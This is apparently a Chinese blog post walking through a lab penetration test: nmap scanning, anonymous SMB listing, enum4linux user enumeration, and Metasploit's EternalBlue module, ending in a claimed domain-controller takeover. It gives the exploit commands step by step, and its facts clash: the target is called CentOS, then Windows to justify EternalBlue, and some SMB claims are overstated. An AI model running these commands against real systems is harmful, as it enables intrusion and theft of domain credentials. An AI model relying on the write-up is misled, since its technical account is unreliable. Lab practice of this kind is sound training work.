返回

饥馑疯狂的靶场实战

见解分享

饥馑疯狂的靶场实战

引言

靶场实战对于黑客和网络安全专业人士来说至关重要。它提供了一个安全的环境,可以磨练技能、测试技术并加深对网络安全威胁的理解。在这篇文章中,我们将深入研究一个饥馑的靶场环境,在这个环境中,攻击者需要在没有虚拟机帐户或密码的情况下渗透域控制器。

环境搭建

我们的攻击环境是:

  • 攻击机:Kali Linux,IP 地址:192.168.1.10
  • 靶场:CentOS(内部),IP 地址:192.168.93.1

第 1 步:信息收集

渗透测试的第一步是进行信息收集。使用 Nmap 扫描靶场以识别开放端口和服务:

nmap -sV -oA scan_report 192.168.93.1

扫描结果显示 139/tcp(NetBIOS Session Service)、445/tcp(SMB)和 8080/tcp(HTTP)端口处于打开状态。

第 2 步:SMB 攻击

NetBIOS Session Service(NetBIOS-SS)允许未经身份验证的远程连接。我们将使用此服务进行 SMB 攻击。

我们首先尝试进行 SMB 匿名连接:

smbclient -L \\\\192.168.93.1\\IPC$

如果成功,我们将获得靶场计算机上的共享列表。

第 3 步:枚举用户

通过 SMB 访问,我们可以枚举靶场上的用户帐户。使用以下命令:

enum4linux -a 192.168.93.1

这将输出域中的所有用户帐户。

第 4 步:利用永恒之蓝

EternalBlue 是针对 SMB 协议的臭名昭著的漏洞。由于靶场是 Windows 系统,因此我们尝试利用 EternalBlue。

使用 Metasploit 框架,我们可以执行以下命令:

use exploit/windows/smb/ms17_010_eternalblue

然后,设置靶机 IP 地址和端口:

set RHOSTS 192.168.93.1
set RPORT 445

最后,执行漏洞利用:

exploit

第 5 步:获取 Meterpreter 会话

如果漏洞利用成功,我们将获得靶机的 Meterpreter 会话。我们可以使用此会话来进一步探索系统并获取敏感信息。

第 6 步:域控渗透

域控制器是域中的关键服务器。要渗透域控制器,我们可以使用 SMB 连接并使用先前枚举的用户凭据进行身份验证。

一旦我们获得了域控访问权限,就可以转储域密码哈希并获取对域的完全控制权。

结论

这次靶场实战展示了在黑盒测试环境中渗透域控制器的过程。通过系统地进行信息收集、利用漏洞和枚举用户,我们成功地获得了敏感信息并获得了对域的控制权。

重要的是要记住,靶场实践与真实世界的黑客攻击存在差异。然而,靶场提供了一个宝贵的环境,可以在其中安全地磨练技能并测试技术。